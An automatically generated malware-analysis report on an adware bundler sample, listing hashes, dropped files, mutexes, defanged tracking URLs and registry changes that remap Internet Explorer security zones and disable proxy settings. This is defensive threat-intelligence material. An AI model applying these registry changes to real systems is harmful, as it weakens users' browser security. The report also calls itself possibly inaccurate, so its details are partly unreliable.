Application.Bundler.DomaIQ.Q_b50a979a4b

by malwarelabrobot on October 22nd, 2014 in Malware Descriptions.

Application.Bundler.DomaIQ.Q (AdAware), Trojan.NSIS.StartPage.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: b50a979a4b4a5df93e68ff718db1e70c
SHA1: 8dedd151e924fb8d4410f08168d4620ceede20b7
SHA256: df0cdd740ce1d68460f74983f7ae1c60bc3d853567427d76f9f91b672c0c5812
SSDeep: 6144:X K03nCYO3UiwGYKADe87J/UoRgiG aaQk3/7nra5W6eRPim01YZM:O3NOkiHoP/ZotaQW/7nryehi0M
Size: 322568 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2013-07-14 23:09:38
Analyzed on: WindowsXPESX SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Application creates the following process(es):

mscorsvw.exe:172
spidentifierimpl.exe:528
%original file name%.exe:940

The Application injects its code into the following process(es):

%original file name%.exe:1600

Mutexes

The following mutexes were created/opened:

ShimCacheMutex
RasPbFile
_!MSFTHISTORY!_
c:!documents and settings!adm!local settings!temporary internet files!content.ie5!
c:!documents and settings!adm!cookies!
c:!documents and settings!adm!local settings!history!history.ie5!
WininetStartupMutex
WininetConnectionMutex
WininetProxyRegistryMutex
ZonesCounterMutex
ZonesCacheCounterMutex
ZonesLockedCacheCounterMutex

File activity

The process spidentifierimpl.exe:528 makes changes in the file system.
The Application creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nstB7.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nstB7.tmp\inetc.dll (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nstB7.tmp\SPtool.dll (180359 bytes)

The Application deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nstB7.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nstB7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsnB6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nstB7.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nstB7.tmp\SPtool.dll (0 bytes)

The process %original file name%.exe:1600 makes changes in the file system.
The Application creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\exe\close.html (384 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\temp\BingHP4info.dfe (740 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\wajam-logo3.png (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\speedupmypc-img.png (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\temp\Browser app shoppinginfo.dfe (734 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\boton_xl.jpg (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\speedupmypc-logo2.png (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\less.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\boton.jpg (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\temp\Genesisinfo.dfe (712 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\bg_app.png (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\exe\box.html (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\position2A.css (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\check-close.png (243 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9U0U7603\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\exe\group.html (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\TheBestDeals\info.html (1323 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\exe\finish.html (299 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\45UV0H2Z\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\bg_app_obv.jpg (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\mypcbackup.png (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\browserapp.css (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\style.css (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\BingHP4\info.html (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\mypcbackup.css (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\percentage-bg.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\jquery.min.js (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\spidentifierimpl.exe (89955 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\wajam-img2-gris.png (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPUB4PUN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\speedupmypc-icon.png (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\Genesis 2\info.html (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\wajam-logo2.png (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\butpause.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\temp\Genesis 2info.dfe (712 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\temp\Browser appinfo.dfe (734 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\temp\MyBackupPcinfo.dfe (611 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\Browser app shopping\info.html (1251 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\MyBackupPc\info.html (1106 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WL2B4963\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\more.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\progress_small.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\vuupc.css (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\wajam-img1-small.png (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\exe\options.html (965 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\progress.png (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\genesis.css (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\temp\templateDisplays.dfe (150 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\position3B.css (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\wajam-img2-gris-small.png (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\temp\TheBestDealsinfo.dfe (750 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\exe\instalando.html (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\bullet-shortw.gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\position3C.css (638 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\position2C.css (578 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\temp\templateStyle.dfe (4069 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\exe\welcome.html (151 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\temp\SpeedUpMyPcinfo.dfe (1215 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\speedupmypc-logo.png (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\bullet-short.gif (54 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\logo-win.jpg (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\speedupmypc-img2.png (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\config.dmc (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\cross.jpg (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\temp\Wajaminfo.dfe (3326 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\wajam-logo.png (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\position3D.css (539 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\position2B.css (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\Genesis\info.html (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\Browser app\info.html (1497 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\bg_app.jpg (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\butplay.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\position1A.css (421 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\binghp4.css (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\wajam-img1.png (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\wajam-img1-gris.png (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\position3A.css (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\temp\Vuupcinfo.dfe (741 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\wajam-img1a.png (11 bytes)
%System%\wbem\Logs\wbemprox.log (228 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\Wajam\info.html (3609 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\Vuupc\info.html (1287 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\progress_small_bg.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\check.jpg (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\speedupmypc.css (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\wajam.css (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\wajam-img2.png (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\thebestdeals.css (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\bullet.gif (58 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\temp\Dockings.dfe (2617 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\position4A.css (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\wajam-big.png (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\SpeedUpMyPc\info.html (2953 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin.dmc (4 bytes)

The process %original file name%.exe:940 makes changes in the file system.
The Application creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\be393027e81a4b88b52679c3751607ae.txt (7854 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswB5.tmp\nsisdl.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\%original file name%.exe (1431 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\res.txt (18 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\%original file name%.exe.config (767 bytes)

The Application deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nshB4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\res.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswB5.tmp (0 bytes)

Registry activity

The process mscorsvw.exe:172 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\State]
"AccumulatedWaitIdleTime" = "1260000"

The process spidentifierimpl.exe:528 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 13 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "26 E5 0C FC 1D 29 82 20 C3 AB 42 A6 26 86 3B DE"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Application modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Application modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Application modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Application deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:1600 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a]
"spidentifierimpl.exe" = "Search Protect Identifier by conduit"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "66 4D 1D DD 7C FB 6F 67 B7 55 5E 0F 0F DC 8C A9"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Application modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Application modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Application modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The process %original file name%.exe:940 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "32 77 5E CB EF 80 B6 5D 3D 9A 79 6E 11 FA 58 63"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

Dropped PE files

MD5 File path
bcd32021c13b7e66581cbc1e44eff79b c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\%original file name%.exe
484003524ef2000db83cb16ced0a48a1 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\spidentifierimpl.exe
1dadb63a5dfaa0679485c5dbaf96033f c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nswB5.tmp\nsisdl.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 23148 23552 4.44633 1c619949741a76b63a54c1e6c4d6b2f8
.rdata 28672 4558 4608 3.62955 6c31e0693072284f258d2c4a271de506
.data 36864 110520 1024 3.36948 78f5760d9fafb71fdbc88c3497afef46
.ndata 147456 61440 0 0 d41d8cd98f00b204e9800998ecf8427e
.rsrc 208896 17000 17408 3.5656 7fae611f3f73978e9992534a50a87055

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 1391
24dfc5735ffdc44ab04ecaf68c5c37c0
248cd4d6bd30996a6869b558faca16ac
22f98262e03b6a9fdd76ef487577e9fb
c07e184b664e31fe5de46e7fc493de4a
54be3ff495bd8cd8c6392147eb53e5bf
c4224fc120b0b6901216579f71e45ef7
a6f1161bacc6ee0dc244bd343cee3d52
4035f9e3a01785a434214c6c78206ae2
56b08547cc69972c86fee86b55113451
0fa967b686efb40270f8b8d5146f6538
801150a4afd013b852620998a092d65e
f43daae470ee7da8d34f9e0946da24b6
b3274d6cd5997d9fcedddee561db6633
4c84417a943bed38a473d00606703bf5
94d6eba469bf9de26f28525fdb336ef6
f17c4a60aea59751f987300141dac91f
3c445e9d72fb2ba6c12364843fda375a
b7b7f244620c26a1b72edd61f9b011de
70a496b643c4d0ec3af903d6174248b3
5f745269d3d3e358ed9825475d45539d
4105b5e5c36a4d68f395dad046321d13
9d586f05d8429bfe8214c733c13eca4e
73043df77e4e2511fb3e87cf47e90e2b
5186f26d09182ee504ee048d6c3e8281
89f5b096648b09f5f0ef1396514e5c86
b651baa3bf7c9c08492cf821ef7a50ae

URLs

URL IP
hxxp://dtrack.sslsecure1.com/debug/Version/4_0_6_30/Nsis/Start 204.11.56.26
hxxp://dtrack.sslsecure1.com/debug/Version/4_0_6_30/Nsis/GetInfo 204.11.56.26
hxxp://dtrack.sslsecure1.com/debug/Version/4_0_6_30/Nsis/CopyFiles 204.11.56.26
